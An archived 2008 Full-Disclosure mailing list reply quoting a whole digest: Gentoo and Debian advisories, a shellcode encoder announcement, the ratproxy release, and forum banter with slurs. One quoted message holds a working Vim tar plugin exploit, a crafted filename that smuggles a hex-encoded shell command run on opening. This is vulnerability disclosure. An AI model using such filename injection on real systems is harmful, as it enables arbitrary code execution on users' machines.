[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Full-Disclosure Digest, Vol 41, Issue 3
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 41, Issue 3
- From: badr muhyeddin <gigiyousef@xxxxxxxxxxx>
- Date: Wed, 2 Jul 2008 14:15:35 +0300
> From: full-disclosure-request@xxxxxxxxxxxxxxxxx> Subject: Full-Disclosure
> Digest, Vol 41, Issue 3> To: full-disclosure@xxxxxxxxxxxxxxxxx> Date: Wed, 2
> Jul 2008 12:00:01 +0100> > Send Full-Disclosure mailing list submissions to>
> full-disclosure@xxxxxxxxxxxxxxxxx> > To subscribe or unsubscribe via the
> World Wide Web, visit>
> https://lists.grok.org.uk/mailman/listinfo/full-disclosure> or, via email,
> send a message with subject or body 'help' to>
> full-disclosure-request@xxxxxxxxxxxxxxxxx> > You can reach the person
> managing the list at> full-disclosure-owner@xxxxxxxxxxxxxxxxx> > When
> replying, please edit your Subject line so it is more specific> than "Re:
> Contents of Full-Disclosure digest..."> > > Note to digest recipients - when
> replying to digest posts, please trim your post appropriately. Thank you.> >
> > Today's Topics:> > 1. [ GLSA 200807-01 ] Python: Multiple integer
> overflows> (Tobias Heinlein)> 2. [ GLSA 200807-02 ] Motion: Execution of
> arbitrary code> (Tobias Heinlein)
> 3. Alphanumeric shellcode improvements (Berend-Jan Wever)> 4. Re:
> [SCANIT-2008-001] QNX phgrafx Privilege Escalation> Vulnerability
> (mrdkaaa@xxxxxxxxx)> 5. Re: Collection of Vulnerabilities in Fully Patched
> Vim 7.1> ( Jan Min?? )> 6. [SECURITY] [DSA 1560-1] New sympa packages fix
> denial of> service (Steve Kemp)> 7. [tool] ratproxy - passive web
> application security assessment> tool (Michal Zalewski)> 8. Re:
> [SCANIT-2008-001] QNX phgrafx Privilege Escalation> Vulnerability (Filipe
> Balestra)> 9. Re: Full-Disclosure? introducing lul-disclosure.> (Tonnerre
> Lombard)> 10. Deepsec Talks 2007 are online - registration for 2008 is open>
> (DeepSec 2008)> 11. Re: Full-Disclosure? introducing lul-disclosure. (root)>
> > > ---------------------------------------------------------------------->
> > Message: 1> Date: Tue, 01 Jul 2008 13:51:43 +0200> From: Tobias Heinlein
> <keytoaster@xxxxxxxxxx>> Subject: [Full-disclosure] [ GLSA 200807-01 ]
> Python: Multiple integer> overflows> To: gentoo-anno
unce@xxxxxxxxxx> Cc: full-disclosure@xxxxxxxxxxxxxxxxx,
bugtraq@xxxxxxxxxxxxxxxxx,> security-alerts@xxxxxxxxxxxxxxxxx> Message-ID:
<486A1A4F.1080404@xxxxxxxxxx>> Content-Type: text/plain; charset="utf-8"> > - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> Gentoo
Linux Security Advisory GLSA 200807-01> - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - -> http://security.gentoo.org/> - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - -> > Severity: Normal>
Title: Python: Multiple integer overflows> Date: July 01, 2008> Bugs: #216673,
#217221> ID: 200807-01> > - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - -> > Synopsis> ========> > Multiple integer overflows may allow
for Denial of Service.> > Background> ==========> > Python is an interpreted,
interactive, object-oriented programming> language.> > Affected packages>
=================> > -------------------------------------------------------
------------> Package / Vulnerable / Unaffected>
-------------------------------------------------------------------> 1
dev-lang/python < 2.4.4-r13 *>= 2.3.6-r6> >= 2.4.4-r13> > Description>
===========> > Multiple vulnerabilities were discovered in Python:> > * David
Remahl reported multiple integer overflows in the file> imageop.c, leading to a
heap-based buffer overflow (CVE-2008-1679).> This issue is due to an incomplete
fix for CVE-2007-4965.> > * Justin Ferguson discovered that an integer
signedness error in the> zlib extension module might trigger insufficient
memory allocation> and a buffer overflow via a negative signed integer
(CVE-2008-1721).> > * Justin Ferguson discovered that insufficient input
validation in> the PyString_FromStringAndSize() function might lead to a
buffer> overflow (CVE-2008-1887).> > Impact> ======> > A remote attacker could
exploit these vulnerabilities to cause a Denial> of Service or possibly the
remote execution of arbitrary code with the
> privileges of the user running Python.> > Workaround> ==========> > There is
> no known workaround at this time.> > Resolution> ==========> > The imageop
> module is no longer built in the unaffected versions.> > All Python 2.3
> users should upgrade to the latest version:> > # emerge --sync> # emerge
> --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6"> > All Python 2.4
> users should upgrade to the latest version:> > # emerge --sync> # emerge
> --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13"> > References>
> ==========> > [ 1 ] CVE-2008-1679>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679> [ 2 ]
> CVE-2008-1721> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721>
> [ 3 ] CVE-2008-1887>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887> > Availability>
> ============> > This GLSA and any updates to it are available for viewing
> at> the Gentoo Security Website:> >
> http://security.gentoo.org/glsa/glsa-200807-01.xml> > Concerns?> =========>
> > Security
is a primary focus of Gentoo Linux and ensuring the> confidentiality and
security of our users machines is of utmost> importance to us. Any security
concerns should be addressed to> security@xxxxxxxxxx or alternatively, you may
file a bug at> http://bugs.gentoo.org.> > License> =======> > Copyright 2008
Gentoo Foundation, Inc; referenced text> belongs to its owner(s).> > The
contents of this document are licensed under the> Creative Commons -
Attribution / Share Alike license.> >
http://creativecommons.org/licenses/by-sa/2.5> > -------------- next part
--------------> A non-text attachment was scrubbed...> Name: signature.asc>
Type: application/pgp-signature> Size: 197 bytes> Desc: OpenPGP digital
signature> Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/26592a7c/attachment-0001.bin
> > ------------------------------> > Message: 2> Date: Tue, 01 Jul 2008
13:59:36 +0200> From: Tobias Heinlein <keytoaster@xxxxxxxxxx>> Subject:
[Full-disclosure] [
GLSA 200807-02 ] Motion: Execution of> arbitrary code> To:
gentoo-announce@xxxxxxxxxx> Cc: full-disclosure@xxxxxxxxxxxxxxxxx,
bugtraq@xxxxxxxxxxxxxxxxx,> security-alerts@xxxxxxxxxxxxxxxxx> Message-ID:
<486A1C28.3010409@xxxxxxxxxx>> Content-Type: text/plain; charset="utf-8"> > - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> Gentoo
Linux Security Advisory GLSA 200807-02> - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - -> http://security.gentoo.org/> - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - -> > Severity: Normal>
Title: Motion: Execution of arbitrary code> Date: July 01, 2008> Bugs: #227053>
ID: 200807-02> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - -> > Synopsis> ========> > Multiple vulnerabilities in Motion might
result in the execution of> arbitrary code.> > Background> ==========> > Motion
is a program that monitors the video signal from one or more> cameras and is
able
to detect motions.> > Affected packages> =================> >
-------------------------------------------------------------------> Package /
Vulnerable / Unaffected>
-------------------------------------------------------------------> 1
media-video/motion < 3.2.10.1 >= 3.2.10.1> > Description> ===========> > Nico
Golde reported an off-by-one error within the read_client()> function in the
webhttpd.c file, leading to a stack-based buffer> overflow. Stefan Cornelius
(Secunia Research) reported a boundary error> within the same function, also
leading to a stack-based buffer> overflow. Both vulnerabilities require that
the HTTP Control interface> is enabled.> > Impact> ======> > A remote attacker
could exploit these vulnerabilities by sending an> overly long or specially
crafted request to a vulnerable Motion HTTP> control interface, possibly
resulting in the execution of arbitrary> code with the privileges of the motion
user.> > Workaround> ==========> > There is no known work
around at this time.> > Resolution> ==========> > All Motion users should
upgrade to the latest version:> > # emerge --sync> # emerge --ask --oneshot
--verbose ">=media-video/motion-3.2.10.1"> > References> ==========> > [ 1 ]
CVE-2008-2654> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654> >
Availability> ============> > This GLSA and any updates to it are available for
viewing at> the Gentoo Security Website:> >
http://security.gentoo.org/glsa/glsa-200807-02.xml> > Concerns?> =========> >
Security is a primary focus of Gentoo Linux and ensuring the> confidentiality
and security of our users machines is of utmost> importance to us. Any security
concerns should be addressed to> security@xxxxxxxxxx or alternatively, you may
file a bug at> http://bugs.gentoo.org.> > License> =======> > Copyright 2008
Gentoo Foundation, Inc; referenced text> belongs to its owner(s).> > The
contents of this document are licensed under the> Creative Commons -
Attribution / Share Alike
license.> > http://creativecommons.org/licenses/by-sa/2.5> > --------------
next part --------------> A non-text attachment was scrubbed...> Name:
signature.asc> Type: application/pgp-signature> Size: 197 bytes> Desc: OpenPGP
digital signature> Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/b9cded25/attachment-0001.bin
> > ------------------------------> > Message: 3> Date: Tue, 1 Jul 2008
14:18:34 +0200> From: "Berend-Jan Wever" <berendjanwever@xxxxxxxxx>> Subject:
[Full-disclosure] Alphanumeric shellcode improvements> To:
full-disclosure@xxxxxxxxxxxxxxxxx> Message-ID:>
<3fa2f5bb0807010518g1316eb13habc42e109ee1b7d9@xxxxxxxxxxxxxx>> Content-Type:
text/plain; charset="iso-8859-1"> > Hi all,> > I've not had as much opportunity
in the last three years to contribute, but> I do have some new stuff: I've
decided to pre-release some parts of ALPHA3,> the upcoming new version of my
alphanumeric shellcode encoder:> * I've reduced the size of the mixedca
se ascii decoder:>
http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86>
* I've created a lowercase ascii decoder:>
http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86>
* I've created a mixedcase ascii decoder for x64:>
http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64>
See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and>
some documentation.> > Cheers,> SkyLined> > -- > Berend-Jan "SkyLined" Wever>
Email & Live messenger: berendjanwever@xxxxxxxxx> --> 'The historical abuses of
new data occurred between the time that a few> people learned the important
thing and the time when that important thing> became general knowledge. To the
Gowachin and to BuSab it was the "Data> Gap," a source of constant danger.'> --
Frank Herbert, 'The Dosadi Experiment'> -------------- next part
--------------> An HTML attachment was scrubbed...> URL: http://lists
.grok.org.uk/pipermail/full-disclosure/attachments/20080701/adf69bc9/attachment-0001.html
> > ------------------------------> > Message: 4> Date: Tue, 01 Jul 2008
16:39:54 +0200 (CEST)> From: mrdkaaa@xxxxxxxxx> Subject: Re: [Full-disclosure]
[SCANIT-2008-001] QNX phgrafx Privilege> Escalation Vulnerability> To:
full-disclosure@xxxxxxxxxxxxxxxxx> Message-ID:
<4.4-28953-1047754371-1214923194@xxxxxxxxx>> Content-Type: text/plain;
charset="us-ascii"> > This vulnerability is at least two years old. Anyway,
what's the point of releasing> a security advisory for a vendor well known to
never going to patch it?> > > > ------------------------------> > Message: 5>
Date: Tue, 1 Jul 2008 20:36:29 +0100> From: " Jan Min?? "
<rdancer@xxxxxxxxxxx>> Subject: Re: [Full-disclosure] Collection of
Vulnerabilities in Fully> Patched Vim 7.1> To:
full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx,>
vim_dev@xxxxxxxxxxxxxxxx, "Bram Moolenaar" <Bram@xxxxxxxxxxxxx>> Cc:
bugs@xxxxxxx> Message
-ID:> <6edf76c20807011236t7f96955h924c2692705b6ff4@xxxxxxxxxxxxxx>>
Content-Type: text/plain; charset=UTF-8> > On Sat, Jun 14, 2008 at 2:09 PM,
Bram Moolenaar <Bram@xxxxxxxxxxxxx> wrote:> >> > Jan Minar wrote:> >> >> 1.
Summary> >>> >> Product : Vim -- Vi IMproved> >> Version : Tested with 7.1.314
and 6.4> >> Impact : Arbitrary code execution> >> Wherefrom: Local and remote>
>> Original : http://www.rdancer.org/vulnerablevim.html> >>> >> Improper
quoting in some parts of Vim written in the Vim Script can lead to> >>
arbitrary code execution upon opening a crafted file.> > > Note that version
7.1.314, as reported in the Summary, does not have> > most of the reported
problems. The problems in the plugins have also> > been fixed, this requires
updating the runtime files. Information about> > that can be found at
http://www.vim.org/runtime.php> > I do apologize: as written in the advisory,
the version I worked with> was 7.1.298. 7.1.314 was only partly vulnerable.
FWIW, I have>
updated the advisory at http://www.rdancer.orgvulnerablevim.html .> > Thanks
to Bram for all the good work.> > 7.2a.10 with updated runtime is still
vulnerable to the zipplugin> attack, and an updated tarplugin attack:> >
-------------------------------------------> -------- Test results below
---------------> -------------------------------------------> filetype.vim>
strong : EXPLOIT FAILED> weak : EXPLOIT FAILED> tarplugin : EXPLOIT FAILED>
tarplugin.updated: VULNERABLE> zipplugin : VULNERABLE> xpm.vim> xpm : EXPLOIT
FAILED> xpm2 : EXPLOIT FAILED> remote : EXPLOIT FAILED> gzip_vim : EXPLOIT
FAILED> netrw : EXPLOIT FAILED> > The original tarplugin exploit now produces a
string of telling error messages:> > /bin/bash: so%: command not found> tar:
/home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:> Cannot open: No
such file or directory> tar: Error is not recoverable: exiting now> /bin/bash:
retu: command not found> /bin/bash: bar.tar|retu|'bar.tar: command not found>
> It's easy to see that it is still possible to execute arbitrary shell
commands.> > $VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:> > 136 if tarfile =~#
'\.\(gz\|tgz\)$'> 137 " call Decho("1: exe silent r! gzip -d -c>
".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")> *138 exe
"silent r! gzip -d -c -- ".s:Escape(tarfile)." |> ".g:tar_cmd."
-".g:tar_browseoptions." - "> 139 elseif tarfile =~# '\.lrp'> 140 " call
Decho("2: exe silent r! cat --> ".s:Escape(tarfile)."|gzip -d -c
-|".g:tar_cmd."> -".g:tar_browseoptions." - ")> *141 exe "silent r! cat --
".s:Escape(tarfile)."|gzip -d -c> -|".g:tar_cmd." -".g:tar_browseoptions." - ">
142 elseif tarfile =~# '\.bz2$'> 143 " call Decho("3: exe silent r! bzip2 -d
-c> ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")> *144
exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." |> ".g:tar_cmd."
-".g:tar_browseoptions." - "> 145 else> 146 " call Decho("4: exe silent r!
".g:tar_cmd."> -".g:tar_browseoptions
." ".s:Escape(tarfile))> **147 exe "silent r! ".g:tar_cmd."
-".g:tar_browseoptions."> ".s:Escape(tarfile)> [...]> 444 fun s:Escape(name)>
445 " shellescape() was added by patch 7.0.111> 446 if exists("*shellescape")>
447 let qnameq= shellescape(a:name)> 448 else> 449 let qnameq= g:tar_shq .
a:name . g:tar_shq> 450 endif> 451 return qnameq> 452 endfun> > (*) s:Escape()
does not suffice, as it fails to escape ``%'' and friends.> > (**) tar(1)
allows arbitrary command execution via options ``--to-command'',> and
``--use-compress-program''.> > > The updated tarplugin attack is rather
simple:> > $ rm -rf ./*> $ touch "foo%;eval eval \`echo
0:64617465203e2070776e6564 |> xxd -r\`;'bar.tar"> $ vim +:q ./foo*> $ ls -l
pwned> -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned> > Cheers,> Jan
Minar.> > > > ------------------------------> > Message: 6> Date: Tue, 1 Jul
2008 21:25:39 +0100> From: Steve Kemp <skx@xxxxxxxxxx>> Subject:
[Full-disclosure] [SECURITY] [DSA 1560-1] New sympa
packages> fix denial of service> To:
debian-security-announce@xxxxxxxxxxxxxxxx> Message-ID:
<20080701202539.GA32605@xxxxxxxxxxxx>> Content-Type: text/plain;
charset=us-ascii> > -----BEGIN PGP SIGNED MESSAGE-----> Hash: SHA1> > -
------------------------------------------------------------------------>
Debian Security Advisory DSA-1600-1 security@xxxxxxxxxx>
http://www.debian.org/security/ Steve Kemp> July 01, 2008
http://www.debian.org/security/faq> -
------------------------------------------------------------------------> >
Package : sympa> Vulnerability : dos> Problem type : remote> Debian-specific:
no> CVE Id(s) : CVE-2008-1648> Debian Bug : 475163> > It was discovered that
sympa, a modern mailing list manager, would> crash when processing certain
types of malformed messages.> > For the stable distribution (etch), this
problem has been fixed in version> 5.2.3-1.2+etch1.> > For the unstable
distribution (sid), this problem has been fixed in> version 5.3.4-4.> > We
recomme
nd that you upgrade your sympa package.> > > Upgrade instructions> -
--------------------> > wget url> will fetch the file for you> dpkg -i
file.deb> will install the referenced file.> > If you are using the apt-get
package manager, use the line for> sources.list as given below:> > apt-get
update> will update the internal database> apt-get upgrade> will install
corrected packages> > You may use an automated update by adding the resources
from the> footer to the proper configuration.> > > Debian GNU/Linux 4.0 alias
etch> - -------------------------------> > Source archives:> >
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.dsc>
Size/MD5 checksum: 625 c7e720e56b1c4e9778cea822ed150a19>
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1.diff.gz>
Size/MD5 checksum: 96804 a93d8ec3dcbc0a0aed99e513c5749c0e>
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3.orig.tar.gz>
Size/MD5 checksum: 5102528 355cb9174841205831191
c93a83da895> > alpha architecture (DEC Alpha)> >
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_alpha.deb>
Size/MD5 checksum: 3589148 26b92215ed7b17531c3702ff76b30901> > amd64
architecture (AMD x86_64 (AMD64))> >
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_amd64.deb>
Size/MD5 checksum: 3591854 531781d522ad5f02e6c5b658883ed37d> > arm
architecture (ARM)> >
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_arm.deb>
Size/MD5 checksum: 3590606 dc3437760b7db4761f90e992e3638c52> > hppa
architecture (HP PA RISC)> >
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_hppa.deb>
Size/MD5 checksum: 3591482 5601933860831577cb017cb0aa3b31fe> > i386
architecture (Intel ia32)> >
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_i386.deb>
Size/MD5 checksum: 3567454 0c6e3d6046f7d0e9920ed7ce9780b103> > ia64
architecture (Intel ia64)> > http://security.debian.org/p
ool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_ia64.deb> Size/MD5 checksum:
3571256 c294184494968264ff0857fc2b907711> > mips architecture (MIPS (Big
Endian))> >
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_mips.deb>
Size/MD5 checksum: 3584362 1b3371fe22966b198a3c338167e71909> > powerpc
architecture (PowerPC)> >
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_powerpc.deb>
Size/MD5 checksum: 3568314 57c566c13cd31f66bbe3652b4c9ea3e7> > s390
architecture (IBM S/390)> >
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_s390.deb>
Size/MD5 checksum: 3568574 afab57a71590dcdd685746b6500040b0> > sparc
architecture (Sun SPARC/UltraSPARC)> >
http://security.debian.org/pool/updates/main/s/sympa/sympa_5.2.3-1.2+etch1_sparc.deb>
Size/MD5 checksum: 3568016 0bf312e31bb5df28404ea40842845caf> > > These files
will probably be moved into the stable distribution on> its next update.> > -
----------------------------
-----------------------------------------------------> For apt-get: deb
http://security.debian.org/ stable/updates main> For dpkg-ftp:
ftp://security.debian.org/debian-security dists/stable/updates/main> Mailing
list: debian-security-announce@xxxxxxxxxxxxxxxx> Package info: `apt-cache show
<pkg>' and http://packages.debian.org/<pkg>> -----BEGIN PGP SIGNATURE----->
Version: GnuPG v1.4.6 (GNU/Linux)> >
iD8DBQFIapKKwM/Gs81MDZ0RAqAtAJ4qQlnuRralKZTMQhtDqYvMXfaqdQCgof4S>
6REh7OX9zxqgWYGHqQWtEpQ=> =ANTa> -----END PGP SIGNATURE-----> > > >
------------------------------> > Message: 7> Date: Wed, 2 Jul 2008 02:02:02
+0200 (CEST)> From: Michal Zalewski <lcamtuf@xxxxxxxx>> Subject:
[Full-disclosure] [tool] ratproxy - passive web application> security
assessment tool> To: bugtraq@xxxxxxxxxxxxxxxxx, websecurity@xxxxxxxxxxxxx> Cc:
full-disclosure@xxxxxxxxxxxxxxxxx> Message-ID:
<Pine.LNX.4.64.0807012124130.17434@xxxxxxxx>> Content-Type: TEXT/PLAIN;
charset=US-ASCII; format=flowed> > Hi all
,> > I am happy to announce that we've just open sourced ratproxy - a free, >
passive web security assessment tool. This utility is designed to >
transparently analyze legitimate, browser-driven interactions with tested > web
applications - and automatically pinpoint, annotate, and prioritize > potential
flaws or areas of concern on the fly.> > The proxy analyzes problems such as
cross-site script inclusion threats, > insufficient cross-site request forgery
defenses, caching issues, > potentially unsafe cross-domain code inclusion
schemes and information > leakage scenarios, and much more.> > For a detailed
discussion of the utility, please visit:>
http://code.google.com/p/ratproxy/wiki/RatproxyDoc> > Source code is available
at:> http://code.google.com/p/ratproxy/downloads/list> > And finally,
screenshot of a sample report can be found here:>
http://lcamtuf.coredump.cx/ratproxy-screen.png> > The tool should run on Linux,
*BSD, MacOS X, and Windows (Cygwin). Since > it is in
beta, there might be some kinks to be ironed out, and not all web >
technologies might be properly accounted for. Feedback is appreciated.> >
Please keep in mind that the proxy is meant to highlight interesting > patterns
in web applications; a further analysis by a security > professional is
required to interpret the significance of results for a > particular platform.>
> Cheers,> /mz> > > > ------------------------------> > Message: 8> Date: Wed,
2 Jul 2008 02:19:01 -0300> From: "Filipe Balestra" <filipe@xxxxxxxxxxxxxxx>>
Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege>
Escalation Vulnerability> To: <full-disclosure@xxxxxxxxxxxxxxxxx>> Message-ID:
<BEDD65A8CCD54B3BAA75664A0D440A93@123PC>> Content-Type: text/plain;
charset="iso-8859-1"> > mrdkaaa,> > are you saying that this vulnerability is
not new to the public?> > The program phgrafx had some vulnerabilities
published, but this one is not the same of any other that I can find in
securityfocus. One
program can have a lot of vulnerabilities :) > > But yes, this vulnerability
is at least four years old, but was not public.> > Anyway, QNX released Service
Packs to solve some security problems in the past, and it's not our problem, we
are advising the customers, they can choose or not the company. If you are a
customer you probably would like to know about security issues in all product
that you use. Also, we agree it's a crap vuln, that's why we took too long to
release it. Whatever, why hold it?> > p.s.: Rodrigo and me are no longer
working for Scanit, so it's just a personal opinion, not a company official
position. If you want to know about the company vulnerability release process
or any other information, please, contact the Scanit R&D team.> > Cheers,> >
Filipe Alcarde Balestra> -------------- next part --------------> An HTML
attachment was scrubbed...> URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/cd6c973d/attachment-0001.html
> > -
-----------------------------> > Message: 9> Date: Wed, 2 Jul 2008 08:29:43
+0200> From: Tonnerre Lombard <tonnerre.lombard@xxxxxxxxxx>> Subject: Re:
[Full-disclosure] Full-Disclosure? introducing> lul-disclosure.> To:
staff@xxxxxxxxxxxxxxxxxx> Cc: full-disclosure@xxxxxxxxxxxxxxxxx> Message-ID:
<20080702082943.2811aba5@xxxxxxxxxxxxxxxxxxxxxxx>> Content-Type: text/plain;
charset="iso-8859-1"> > Salut,> > On Mon, 30 Jun 2008 21:57:29 -0400, staff
wrote:> > Are you ready for a site that isn't full of fagottry? Where Gadi
cant> > steal your money or eat your lunches? Where you can freely submit> >
lulz to be published? Where Theo's defeat and denial are brought to> > light?
Wait no more!> > You mean a site which evidently cannot tell the difference
between> local and remote root vulnerabilities? (The local root exploit for>
obsd4 which is published on that site contains a patch to increment the> count
of _remote_ vulnerabilities on the obsd web site.)> > Tonnerre> -- > SyGroup G
mbH> Tonnerre Lombard> > Solutions Systematiques> Tel:+41 61 333 80 33
G?terstrasse 86> Fax:+41 61 383 14 67 4053 Basel> Web:www.sygroup.ch
tonnerre.lombard@xxxxxxxxxx> -------------- next part --------------> A
non-text attachment was scrubbed...> Name: signature.asc> Type:
application/pgp-signature> Size: 835 bytes> Desc: not available> Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/0174b22f/attachment-0001.bin
> > ------------------------------> > Message: 10> Date: Tue, 01 Jul 2008
21:47:36 +0200> From: DeepSec 2008 <deepsec@xxxxxxxxxxx>> Subject:
[Full-disclosure] Deepsec Talks 2007 are online -> registration for 2008 is
open> To: full-disclosure@xxxxxxxxxxxxxxxxx> Message-ID:
<486A89D8.2000303@xxxxxxxxxxx>> Content-Type: text/plain; charset=UTF-8;
format=flowed> > Dear Madam, dear Sir,> > DeepSec Vienna, the annual In-Depth
Security Conference has opened> online registrations for 2008. Registrations
will receive a discount> of 5% off the
regular fees until August 31st if you use the following> promotional code:
earlybird-L4KZIEUE on our online registration form> at
https://deepsec.net/register/> > Videos from 2007 are online:> > Also we are
happy to announce that talks from last years conference> are online. Listen to
last years talks in full length at:>
http://video.google.com/videosearch?q=deepsec&sitesearch=#> > Call for Papers
still Open for two weeks:> > If you have some good ideas for a Talk at the
conference and haven't> decided yet to submit we encourage you to do so now. We
still accept> submissions at https://deepsec.net/cfp/ or via e-mail to:>
cfp@xxxxxxxxxxx> > > We hope to hear from you and of course to meet in Vienna
in November!> > Best Regards,> > Paul B?hm,> Ren? Pfeiffer,> Michael Kafka>
DeepSec GmbH> > > -- > DeepSec In-Depth Security Conference> November 11nd to
14th 2008, Vienna, Austria> https://deepsec.net/> > > >
------------------------------> > Message: 11> Date: Wed, 02 Jul 2008 04
:08:38 -0300> From: root <root_@xxxxxxxxxxxxxxx>> Subject: Re:
[Full-disclosure] Full-Disclosure? introducing> lul-disclosure.> To:
staff@xxxxxxxxxxxxxxxxxx> Cc: full-disclosure@xxxxxxxxxxxxxxxxx> Message-ID:
<486B2976.8000708@xxxxxxxxxxxxxxx>> Content-Type: text/plain;
charset=ISO-8859-1; format=flowed> > You couldn't do the remote exploit even
with a google video documenting > it step by step.> More like fail-disclosure.>
> staff wrote:> > Are you ready for a site that isn't full of fagottry? Where
Gadi cant steal> > your money or eat your lunches? Where you can freely submit
lulz to be> > published? Where Theo's defeat and denial are brought to light?
Wait no> > more!> > > > http://lul-disclosure.net/> > > > WhiteHat? BlackHat?
We are lulzhat.> > Fuck you and your hats.> > > > > > > >
------------------------------------------------------------------------> > > >
_______________________________________________> > Full-Disclosure - We believe
in it.> > Charter: http://list
s.grok.org.uk/full-disclosure-charter.html> > Hosted and sponsored by Secunia
- http://secunia.com/> > > > ------------------------------> >
_______________________________________________> Full-Disclosure - We believe
in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html> Hosted
and sponsored by Secunia - http://secunia.com/> > End of Full-Disclosure
Digest, Vol 41, Issue 3>
**********************************************unsubscribe
_________________________________________________________________
Invite your mail contacts to join your friends list with Windows Live Spaces.
It's easy!
http://spaces.live.com/spacesapi.aspx?wx_action=create&wx_url=/friends.aspx&mkt=en-us_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/